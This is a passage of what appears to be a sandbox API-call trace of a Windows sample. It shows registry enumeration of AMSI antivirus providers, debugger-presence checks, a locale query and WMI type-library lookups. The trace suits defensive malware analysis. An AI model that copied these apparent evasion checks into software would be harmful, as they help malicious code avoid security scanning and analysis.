          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\AMSI\\Providers"
              },
              {
                "name": "Handle",
                "value": "0x0000037c"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\AMSI\\Providers"
              }
            ],
            "repeated": 0,
            "id": 958
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "registry",
            "api": "RegQueryInfoKeyW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000037c"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "SubKeyCount",
                "value": "0"
              },
              {
                "name": "MaxSubKeyLength",
                "value": "38"
              },
              {
                "name": "MaxClassLength",
                "value": "0"
              },
              {
                "name": "ValueCount",
                "value": "0"
              },
              {
                "name": "MaxValueNameLength",
                "value": "0"
              },
              {
                "name": "MaxValueLength",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 959
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "registry",
            "api": "RegEnumKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037c"
              },
              {
                "name": "Index",
                "value": "0"
              },
              {
                "name": "Name",
                "value": "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}"
              }
            ],
            "repeated": 0,
            "id": 960
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "misc",
            "api": "RtlSetCurrentTransaction",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "TransactionHandle",
                "value": "0x00000000"
              }
            ],
            "repeated": 1,
            "id": 961
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x000000c8"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 962
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x000000c8"
              },
              {
                "name": "ObjectAttributesName",
                "value": "Software\\Classes\\CLSID\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\\InprocServer32"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\CLSID\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\\InprocServer32"
              }
            ],
            "repeated": 0,
            "id": 963
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "system",
            "api": "IsDebuggerPresent",
            "status": false,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 964
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "registry",
            "api": "RegEnumKeyExW",
            "status": false,
            "return": "0x00000103",
            "pretty_return": "NO_MORE_ITEMS",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037c"
              },
              {
                "name": "Index",
                "value": "1"
              },
              {
                "name": "Name",
                "value": ""
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\AMSI\\Providers\\"
              }
            ],
            "repeated": 0,
            "id": 965
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037c"
              }
            ],
            "repeated": 0,
            "id": 966
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000378"
              }
            ],
            "repeated": 0,
            "id": 967
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00965000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 968
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00968000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 969
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\AMSI\\Providers"
              },
              {
                "name": "Handle",
                "value": "0x0000037c"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\AMSI\\Providers"
              }
            ],
            "repeated": 0,
            "id": 970
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "registry",
            "api": "RegQueryInfoKeyW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000037c"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "SubKeyCount",
                "value": "0"
              },
              {
                "name": "MaxSubKeyLength",
                "value": "38"
              },
              {
                "name": "MaxClassLength",
                "value": "0"
              },
              {
                "name": "ValueCount",
                "value": "0"
              },
              {
                "name": "MaxValueNameLength",
                "value": "0"
              },
              {
                "name": "MaxValueLength",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 971
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "registry",
            "api": "RegEnumKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037c"
              },
              {
                "name": "Index",
                "value": "0"
              },
              {
                "name": "Name",
                "value": "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}"
              }
            ],
            "repeated": 0,
            "id": 972
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "misc",
            "api": "RtlSetCurrentTransaction",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "TransactionHandle",
                "value": "0x00000000"
              }
            ],
            "repeated": 1,
            "id": 973
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x000000c8"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 974
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x000000c8"
              },
              {
                "name": "ObjectAttributesName",
                "value": "Software\\Classes\\CLSID\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\\InprocServer32"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\CLSID\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\\InprocServer32"
              }
            ],
            "repeated": 0,
            "id": 975
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "system",
            "api": "IsDebuggerPresent",
            "status": false,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 976
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "registry",
            "api": "RegEnumKeyExW",
            "status": false,
            "return": "0x00000103",
            "pretty_return": "NO_MORE_ITEMS",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037c"
              },
              {
                "name": "Index",
                "value": "1"
              },
              {
                "name": "Name",
                "value": ""
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\AMSI\\Providers\\"
              }
            ],
            "repeated": 0,
            "id": 977
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037c"
              }
            ],
            "repeated": 0,
            "id": 978
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000378"
              }
            ],
            "repeated": 0,
            "id": 979
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "GetUserDefaultLCID",
            "status": true,
            "return": "0x00000419",
            "arguments": [
              {
                "name": "SystemDefaultLangID",
                "value": "0x00000419"
              },
              {
                "name": "LanguageName",
                "value": "Russian"
              }
            ],
            "repeated": 0,
            "id": 980
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "00000346-0000-0000-C000-000000000046"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "E085AD58-B839-4625-B40B-4CC546E82D75"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 981
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020119",
                "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\MACHINE\\Software\\Classes\\PackagedCom"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\PackagedCom"
              }
            ],
            "repeated": 0,
            "id": 982
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtOpenProcessToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000008"
              },
              {
                "name": "TokenHandle",
                "value": "0x00000378"
              }
            ],
            "repeated": 0,
            "id": 983
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "20"
              },
              {
                "name": "TokenInformation",
                "value": "\\x01\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 984
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "18"
              },
              {
                "name": "TokenInformation",
                "value": "\\x01\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 985
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "@\\x92\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\xf0'\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd8'\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb0\\x93\\x7f\\x00\\x00\\x00\\x00\\x00!\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 986
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000037c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x02000000",
                "pretty_value": "MAXIMUM_ALLOWED"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\User\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes"
              }
            ],
            "repeated": 0,
            "id": 987
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000378"
              }
            ],
            "repeated": 0,
            "id": 988
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000037e"
              },
              {
                "name": "SubKey",
                "value": "TypeLib"
              },
              {
                "name": "Handle",
                "value": "0x0000037a"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib"
              }
            ],
            "repeated": 0,
            "id": 989
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037e"
              }
            ],
            "repeated": 0,
            "id": 990
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000037a"
              },
              {
                "name": "SubKey",
                "value": "{565783C6-CB41-11D1-8B02-00600806D9B6}"
              },
              {
                "name": "Handle",
                "value": "0x0000037e"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}"
              }
            ],
            "repeated": 0,
            "id": 991
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000037e"
              },
              {
                "name": "SubKey",
                "value": "1.0"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.0"
              }
            ],
            "repeated": 0,
            "id": 992
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegEnumKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037e"
              },
              {
                "name": "Index",
                "value": "0"
              },
              {
                "name": "Name",
                "value": "1.2"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2"
              }
            ],
            "repeated": 0,
            "id": 993
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegEnumKeyExW",
            "status": false,
            "return": "0x00000103",
            "pretty_return": "NO_MORE_ITEMS",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037e"
              },
              {
                "name": "Index",
                "value": "1"
              },
              {
                "name": "Name",
                "value": ""
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\"
              }
            ],
            "repeated": 0,
            "id": 994
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000037e"
              },
              {
                "name": "SubKey",
                "value": "1.2"
              },
              {
                "name": "Handle",
                "value": "0x00000382"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2"
              }
            ],
            "repeated": 0,
            "id": 995
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000382"
              },
              {
                "name": "SubKey",
                "value": "419"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\419"
              }
            ],
            "repeated": 0,
            "id": 996
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000382"
              },
              {
                "name": "SubKey",
                "value": "19"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\19"
              }
            ],
            "repeated": 0,
            "id": 997
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000382"
              },
              {
                "name": "SubKey",
                "value": "0"
              },
              {
                "name": "Handle",
                "value": "0x00000386"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0"
              }
            ],
            "repeated": 0,
            "id": 998
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000386"
              },
              {
                "name": "SubKey",
                "value": "win64"
              },
              {
                "name": "Handle",
                "value": "0x0000038a"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64"
              }
            ],
            "repeated": 0,
            "id": 999
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000038a"
              }
            ],
            "repeated": 0,
            "id": 1000
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000386"
              }
            ],
            "repeated": 0,
            "id": 1001
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000382"
              },
              {
                "name": "SubKey",
                "value": "0"
              },
              {
                "name": "Handle",
                "value": "0x00000386"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0"
              }
            ],
            "repeated": 0,
            "id": 1002
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000386"
              },
              {
                "name": "KeyInformation",
                "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0"
              },
              {
                "name": "KeyInformationClass",
                "value": "3"
              }
            ],
            "repeated": 0,
            "id": 1003
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000386"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 1004
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "P\\x8b\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x86\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x8c\\x7f\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1005
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64"
              }
            ],
            "repeated": 0,
            "id": 1006
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000386"
